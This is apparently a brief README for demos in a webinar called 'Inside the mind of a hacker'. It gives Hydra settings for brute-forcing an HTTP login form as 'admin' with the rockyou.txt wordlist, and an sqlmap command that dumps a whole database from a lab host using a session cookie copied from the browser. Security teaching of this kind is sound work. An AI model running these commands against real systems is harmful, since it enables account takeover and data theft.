This repository contains the Demos for the webinar "Inside the mind of a hacker"
- Software: Hydra + rockyou.txt
- Options:
- TARGET Single target <>
- Port: 80
- Protocol: http-post-form
- Username: admin
- Password List: /usr/share/wordlists/rockyou.txt
- http url: /login:username=^USER^&password=^PASS^:again
- Software: SQLMap
- Command Line:
sqlmap -u "http://victima.local/invoices?Description=Invoice+1" --dump-all --batch --headers="cookie:session=XXX"
where XXX is the session cookie value retreived from the browser.